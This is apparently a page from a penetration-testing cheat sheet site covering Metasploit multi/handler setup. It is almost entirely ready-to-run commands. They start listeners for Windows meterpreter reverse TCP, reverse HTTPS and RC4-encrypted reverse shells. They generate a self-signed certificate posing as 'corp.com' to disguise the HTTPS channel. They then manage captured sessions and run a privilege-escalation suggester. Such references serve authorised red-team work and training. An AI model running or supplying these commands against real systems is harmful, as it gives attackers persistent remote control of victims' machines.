🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸ’£ msfvenom / Handler Setup

Handler Setup

Basic multi/handler

msfconsole -q
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <ip>
set LPORT 4444
set ExitOnSession false
exploit -j

One-liner handler

msfconsole -q -x "use multi/handler; \
  set payload windows/x64/meterpreter/reverse_tcp; \
  set LHOST <ip>; set LPORT 4444; \
  set ExitOnSession false; exploit -j"

HTTPS handler with SSL cert

msfconsole -q -x "use multi/handler; \
  set payload windows/x64/meterpreter/reverse_https; \
  set LHOST <ip>; set LPORT 443; \
  set HandlerSSLCert ssl.pem; \
  set StagerVerifySSLCert true; \
  exploit -j"

Generate self-signed SSL cert

openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
  -subj "/C=US/ST=CA/L=SF/O=Corp/CN=corp.com" \
  -keyout ssl.key -out ssl.crt
cat ssl.key ssl.crt > ssl.pem

RC4 handler

msfconsole -q -x "use multi/handler; \
  set payload windows/meterpreter/reverse_tcp_rc4; \
  set LHOST <ip>; set LPORT 4444; \
  set RC4PASSWORD MyKey123; \
  exploit -j"

Session management

sessions -l           # list sessions
sessions -i 1         # interact with session 1
sessions -u 1         # upgrade to meterpreter
background            # background current session
run post/multi/recon/local_exploit_suggester  # privesc suggestions